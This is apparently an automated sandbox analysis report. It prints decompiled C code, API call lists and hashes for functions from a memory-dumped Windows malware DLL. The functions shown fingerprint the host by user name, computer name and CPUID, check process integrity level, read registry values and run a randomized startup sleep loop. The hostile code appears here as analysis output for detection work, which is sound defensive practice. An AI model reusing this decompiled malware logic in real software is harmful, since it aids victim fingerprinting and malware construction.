				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x481a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E0481283A(_v8 + _v8, _t63);
						}
						HeapFree( *0x481a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                0x04814454
                                0x0481445c
                                0x04814462
                                0x04814465
                                0x04814468
                                0x0481446a
                                0x0481446f
                                0x0481446f
                                0x04814475
                                0x04814477
                                0x04814484
                                0x048144e5
                                0x04814486
                                0x0481448b
                                0x04814491
                                0x04814496
                                0x048144a4
                                0x048144a8
                                0x048144b7
                                0x048144be
                                0x048144c5
                                0x048144c5
                                0x048144d0
                                0x048144d0
                                0x048144a8
                                0x04814496
                                0x048144e7
                                0x048144ed
                                0x048144f7
                                0x048144f9
                                0x048144fe
                                0x0481450d
                                0x04814511
                                0x0481451c
                                0x04814523
                                0x0481452a
                                0x0481452a
                                0x04814536
                                0x04814536
                                0x04814511
                                0x0481453f
                                0x04814541
                                0x04814544
                                0x04814546
                                0x04814549
                                0x0481454c
                                0x04814556
                                0x0481455a
                                0x0481455e

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,048155CE), ref: 0481448B
                                • RtlAllocateHeap.NTDLL(00000000,048155CE), ref: 048144A2
                                • GetUserNameW.ADVAPI32(00000000,048155CE), ref: 048144AF
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,048155CE,?,?,?,?,?,04816BD8,?,00000001), ref: 048144D0
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 048144F7
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0481450B
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04814518
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04814536
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID:
                                • API String ID: 3239747167-0
                                • Opcode ID: cf44d9fe943e03895782e63d5e48a101b6aff64fe7aaa4c109878aaf764c90eb
                                • Instruction ID: cb48eaa7971395fc03bafb309868f27d03f533a91ccd0a2c3e8a19ca12208216
                                • Opcode Fuzzy Hash: cf44d9fe943e03895782e63d5e48a101b6aff64fe7aaa4c109878aaf764c90eb
                                • Instruction Fuzzy Hash: 08311BB1A01209EFDB11DFA9D880AAEB7FDFB48714F11496AE545E3220D779EE40DB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048153F2, Relevance: 10.7, APIs: 7, Instructions: 191memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E048153F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E048158F8();
				if(_t27 != 0) {
					_t77 =  *0x481a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x481a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x481a148(0, 2);
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E0481696F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x481a2d4; // 0x20bd5a8
					_push(0x481a2fc);
					_push(1);
					_t7 = _t32 + 0x481b5ad; // 0x4d283a53
					 *0x481a2f8 = 0xc;
					 *0x481a300 = 0;
					L04814AF8();
					_t36 = E04816384(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E04814454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E04816837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x481a2d4; // 0x20bd5a8
								_t18 = _t64 + 0x481b84f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x481a32c = _t87;
						}
						_t38 = E048160E1();
						 *0x481a2c8 =  *0x481a2c8 ^ 0xe8fa7dd7;
						 *0x481a31c = _t38;
						_t39 = E04816837(0x60);
						__eflags = _t39;
						 *0x481a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x481a37c; // 0x68d9630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x481a37c; // 0x68d9630
							 *_t56 = 0x481b83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x481a290, _t84, 0x43);
							__eflags = _t42;
							 *0x481a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x481a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x481a2d4; // 0x20bd5a8
								_t19 = _t76 + 0x481b53a; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x48192a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E04814454( ~_v8 &  *0x481a2c8, 0x481a00c); // executed
								_t84 = E04812206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E04811376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E04812022(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E04812439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x481a14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E04816BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}






































                                0x048153f2
                                0x048153fd
                                0x04815400
                                0x04815403
                                0x04815406
                                0x0481540d
                                0x0481540f
                                0x0481541b
                                0x0481541d
                                0x0481541d
                                0x04815426
                                0x0481542e
                                0x04815431
                                0x0481544b
                                0x04815450
                                0x04815451
                                0x04815453
                                0x04815458
                                0x0481545d
                                0x0481545f
                                0x04815466
                                0x04815470
                                0x04815476
                                0x04815483
                                0x0481548a
                                0x0481548f
                                0x0481548f
                                0x04815498
                                0x048154c1
                                0x048154c4
                                0x048154d1
                                0x048154d8
                                0x048154e4
                                0x048154e6
                                0x048154e8
                                0x048154ed
                                0x048154f3
                                0x048154f9
                                0x048154ff
                                0x04815502
                                0x04815507
                                0x0481550f
                                0x04815511
                                0x04815511
                                0x04815514
                                0x04815514
                                0x0481551a
                                0x0481551f
                                0x04815527
                                0x0481552c
                                0x04815531
                                0x04815533
                                0x04815538
                                0x04815567
                                0x0481553a
                                0x0481553f
                                0x04815544
                                0x04815549
                                0x04815550
                                0x04815556
                                0x0481555b
                                0x04815561
                                0x04815561
                                0x04815568
                                0x0481556a
                                0x04815579
                                0x0481557f
                                0x04815581
                                0x04815586
                                0x048155b2
                                0x04815588
                                0x04815588
                                0x0481558e
                                0x0481559b
                                0x048155a1
                                0x048155a1
                                0x048155a9
                                0x048155ab
                                0x048155b3
                                0x048155b5
                                0x048155bc
                                0x048155c9
                                0x048155d3
                                0x048155d5
                                0x048155d7
                                0x00000000
                                0x00000000
                                0x048155d9
                                0x048155de
                                0x048155e0
                                0x048155e7
                                0x048155eb
                                0x048155ee
                                0x04815603
                                0x04815607
                                0x0481560c
                                0x00000000
                                0x0481560c
                                0x048155f0
                                0x048155f2
                                0x00000000
                                0x00000000
                                0x048155f4
                                0x048155fd
                                0x048155ff
                                0x04815601
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04815601
                                0x048155e4
                                0x048155e4
                                0x048155b5
                                0x0481549a
                                0x0481549a
                                0x0481549f
                                0x0481560e
                                0x04815612
                                0x0481561a
                                0x0481561a
                                0x00000000
                                0x04815612
                                0x048154a5
                                0x048154a8
                                0x048154a8
                                0x048154aa
                                0x048154ad
                                0x048154b5
                                0x048154bc
                                0x00000000
                                0x04815622
                                0x04815622
                                0x04815625
                                0x0481562a
                                0x0481562a

                                APIs
                                  • Part of subcall function 048158F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,0481540B,00000000,00000000,00000000,?,?,?,?,?,04816BD8,?,00000001), ref: 04815907
                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0481A2FC,00000000), ref: 04815476
                                • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,04816BD8,?,00000001), ref: 0481548F
                                • wsprintfA.USER32 ref: 0481550F
                                • memset.NTDLL ref: 0481553F
                                • RtlInitializeCriticalSection.NTDLL(068D95F0), ref: 04815550
                                • RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 04815579
                                • wsprintfA.USER32 ref: 048155A9
                                  • Part of subcall function 04814454: GetUserNameW.ADVAPI32(00000000,048155CE), ref: 0481448B
                                  • Part of subcall function 04814454: RtlAllocateHeap.NTDLL(00000000,048155CE), ref: 048144A2
                                  • Part of subcall function 04814454: GetUserNameW.ADVAPI32(00000000,048155CE), ref: 048144AF
                                  • Part of subcall function 04814454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,048155CE,?,?,?,?,?,04816BD8,?,00000001), ref: 048144D0
                                  • Part of subcall function 04814454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 048144F7
                                  • Part of subcall function 04814454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0481450B
                                  • Part of subcall function 04814454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 04814518
                                  • Part of subcall function 04814454: HeapFree.KERNEL32(00000000,00000000), ref: 04814536
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                • String ID:
                                • API String ID: 2910951584-0
                                • Opcode ID: a5e67300b6f517991a3499b7b6cc566a469e947dee4a0f625af4f5dfce9cf64a
                                • Instruction ID: 7cf53a55d3599b5f67e03f5e261b1aa11ad6632eaebd0ff3fb8759a252148e97
                                • Opcode Fuzzy Hash: a5e67300b6f517991a3499b7b6cc566a469e947dee4a0f625af4f5dfce9cf64a
                                • Instruction Fuzzy Hash: B851C4B1A01225AFEB15DBA8D844BAE73ACEB84754F100E17E905E7170D7B8FD408B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0481113D, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0481113D(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x481a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04816837(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E048150CA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                0x0481114a
                                0x04811151
                                0x04811158
                                0x0481116c
                                0x04811177
                                0x0481118f
                                0x0481119c
                                0x0481119f
                                0x048111a4
                                0x048111af
                                0x048111b3
                                0x048111c2
                                0x048111c6
                                0x048111e2
                                0x048111e2
                                0x048111e6
                                0x048111e6
                                0x048111eb
                                0x048111ef
                                0x048111f5
                                0x048111f6
                                0x048111fd
                                0x04811203

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0481116F
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 0481118F
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0481119F
                                • CloseHandle.KERNEL32(00000000), ref: 048111EF
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 048111C2
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 048111CA
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 048111DA
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 56a978d85c985edc5f06294e268b4f21f8d1f077ec28103f0b537c923b29d7d0
                                • Instruction ID: 329577cf64d18fc19365d53c1b8c17a7acfc318c8ca8019260eac4122b1e8dc4
                                • Opcode Fuzzy Hash: 56a978d85c985edc5f06294e268b4f21f8d1f077ec28103f0b537c923b29d7d0
                                • Instruction Fuzzy Hash: 8D215C75900209FFEB01AF94CC48EAEBBBCEB08304F0045A6E601E6261D7759E44EB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04816B0F, Relevance: 10.6, APIs: 7, Instructions: 72sleepmemorytimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			E04816B0F(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x481a290 = _t14;
				if(_t14 != 0) {
					 *0x481a180 = GetTickCount();
					_t16 = E04814C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L04817EEA();
						_t40 = _t18 + _t20;
						_t22 = E0481414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x481a2ac; // 0x350
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x481a2b8 = 1; // executed
						}
					}
					_t16 = E048153F2(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}
















                                0x04816b0f
                                0x04816b24
                                0x04816b2c
                                0x04816b31
                                0x04816b44
                                0x04816b49
                                0x04816b50
                                0x04816bd8
                                0x04816bde
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04816b56
                                0x04816b56
                                0x04816b5b
                                0x04816b61
                                0x04816b67
                                0x04816b71
                                0x04816b75
                                0x04816b76
                                0x04816b7b
                                0x04816b7c
                                0x04816b7d
                                0x04816b82
                                0x04816b88
                                0x04816b91
                                0x04816b97
                                0x04816b9d
                                0x04816ba2
                                0x04816ba9
                                0x04816bad
                                0x04816bb5
                                0x04816bbd
                                0x04816bbf
                                0x04816bbf
                                0x04816bc7
                                0x04816bc9
                                0x04816bc9
                                0x04816bc7
                                0x04816bd3
                                0x00000000
                                0x04816bd3
                                0x04816b35
                                0x00000000

                                APIs
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04816B24
                                • GetTickCount.KERNEL32 ref: 04816B3B
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 04816B5B
                                • SwitchToThread.KERNEL32(?,00000001), ref: 04816B61
                                • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04816B7D
                                • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 04816B97
                                • IsWow64Process.KERNEL32(00000350,?,?,00000001), ref: 04816BB5
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                • String ID:
                                • API String ID: 3690864001-0
                                • Opcode ID: a86c21b0ac3895ecf9d8cd40c6f71f65a9877d65f6a1484b9997869124e1b0ca
                                • Instruction ID: c83b391d839b0ee8f456e4b93f57c5d2c0a5bf2dc0621f243488dba01e9deb35
                                • Opcode Fuzzy Hash: a86c21b0ac3895ecf9d8cd40c6f71f65a9877d65f6a1484b9997869124e1b0ca
                                • Instruction Fuzzy Hash: 9A21C3B2A04214AFD710AF68D898E6A779CF744364F004E2BF549D6160E779AC04CB62
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048171A5, Relevance: 4.6, APIs: 3, Instructions: 54registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E048171A5(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x481a2d4; // 0x20bd5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x481ba30; // 0x4f0053
				_v16 = 4;
				_t31 = E04813875(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x481a2d4; // 0x20bd5a8
					_t5 = _t19 + 0x481ba8c; // 0x6e0049
					_t34 = E04813875(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E048150CA(_t34);
					}
					E048150CA(_t31);
				}
				return _v8;
			}













                                0x048171ab
                                0x048171b0
                                0x048171b5
                                0x048171bc
                                0x048171c8
                                0x048171cc
                                0x048171ce
                                0x048171d4
                                0x048171e0
                                0x048171e4
                                0x048171f7
                                0x048171ff
                                0x04817213
                                0x0481721b
                                0x0481721d
                                0x0481721d
                                0x04817224
                                0x04817224
                                0x0481722b
                                0x0481722b
                                0x04817231
                                0x04817236
                                0x0481723c

                                APIs
                                  • Part of subcall function 04813875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,048171C8,004F0053,00000000,?), ref: 0481387E
                                  • Part of subcall function 04813875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,048171C8,004F0053,00000000,?), ref: 048138A8
                                  • Part of subcall function 04813875: memset.NTDLL ref: 048138BC
                                • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 048171F7
                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 04817213
                                • RegCloseKey.ADVAPI32(00000000), ref: 04817224
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                • String ID:
                                • API String ID: 830012212-0
                                • Opcode ID: dd2fac8d4aa3b4cbcdac86e46989c20ab3e447149bc3a8445cf635c3aa744943
                                • Instruction ID: 867c856fbd2583e565b3acb654c8443f64874064c148ad5d2b87b15792d0f1f8
                                • Opcode Fuzzy Hash: dd2fac8d4aa3b4cbcdac86e46989c20ab3e447149bc3a8445cf635c3aa744943
                                • Instruction Fuzzy Hash: BF115E72600209FBEB11EBD8DC84FAE77BCEB44304F10095BB605E7061EBB4EA459B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04815685, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x481a294) == 0) {
						E04815076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x481a294) == 1) {
						_t10 = E04816B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}







                                0x0481568c
                                0x0481568d
                                0x04815690
                                0x048156c2
                                0x048156c4
                                0x048156c4
                                0x04815692
                                0x04815693
                                0x048156a8
                                0x048156af
                                0x048156b1
                                0x048156b1
                                0x048156af
                                0x04815693
                                0x048156cc

                                APIs
                                • InterlockedIncrement.KERNEL32(0481A294), ref: 0481569A
                                  • Part of subcall function 04816B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04816B24
                                • InterlockedDecrement.KERNEL32(0481A294), ref: 048156BA
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: 2b93cb02866bb178367db2d3ff08b566ee4e651698b8cad57105c8bd16c8acdc
                                • Instruction ID: 2724f3841bc0408c851053ad27392903b8be7ccc4fc18498451edf1a351f71b0
                                • Opcode Fuzzy Hash: 2b93cb02866bb178367db2d3ff08b566ee4e651698b8cad57105c8bd16c8acdc
                                • Instruction Fuzzy Hash: 94E04F35304332B797266EA89C24B9E675CAB80BC4F008F17E481E1038E754F840C6E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04811AB8, Relevance: 2.6, APIs: 2, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E04811AB8(void* __edx) {
				char _v8;
				char _v12;
				void* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04814C8C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x481a2d4; // 0x20bd5a8
				_t4 = _t24 + 0x481bd60; // 0x68d9308
				_t5 = _t24 + 0x481bd08; // 0x4f0053
				_t45 = E04815384( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					 *0x481a124(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x481a2d4; // 0x20bd5a8
						_t11 = _t32 + 0x481bd54; // 0x68d92fc
						_t48 = _t11;
						_t12 = _t32 + 0x481bd08; // 0x4f0053
						_t52 = E04815D37(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x481a2d4; // 0x20bd5a8
							_t13 = _t35 + 0x481bd9e; // 0x30314549
							if(E048174B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x481a2b4 - 6;
								if( *0x481a2b4 <= 6) {
									_t42 =  *0x481a2d4; // 0x20bd5a8
									_t15 = _t42 + 0x481bbaa; // 0x52384549
									E048174B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x481a2d4; // 0x20bd5a8
							_t17 = _t38 + 0x481bd98; // 0x68d9340
							_t18 = _t38 + 0x481bd70; // 0x680043
							_t45 = E04811F7A(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x481a290, 0, _t52);
						}
					}
					HeapFree( *0x481a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04813C84(_t54);
				}
				return _t45;
			}

















                                0x04811ab8
                                0x04811ac8
                                0x04811acb
                                0x04811ad2
                                0x04811ad4
                                0x04811ad4
                                0x04811ad7
                                0x04811adc
                                0x04811ae3
                                0x04811af5
                                0x04811af9
                                0x04811b07
                                0x04811b15
                                0x04811b19
                                0x04811baa
                                0x04811baa
                                0x04811b1f
                                0x04811b1f
                                0x04811b24
                                0x04811b24
                                0x04811b2b
                                0x04811b37
                                0x04811b39
                                0x04811b3b
                                0x04811b3d
                                0x04811b44
                                0x04811b56
                                0x04811b58
                                0x04811b5f
                                0x04811b61
                                0x04811b68
                                0x04811b73
                                0x04811b73
                                0x04811b5f
                                0x04811b78
                                0x04811b7d
                                0x04811b84
                                0x04811ba2
                                0x04811ba4
                                0x04811ba4
                                0x04811b3b
                                0x04811bb6
                                0x04811bb6
                                0x04811bb8
                                0x04811bbd
                                0x04811bbf
                                0x04811bbf
                                0x04811bca

                                APIs
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068D9340,?,00000000,30314549,00000014,004F0053,068D92FC), ref: 04811BA4
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,048120B0), ref: 04811BB6
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
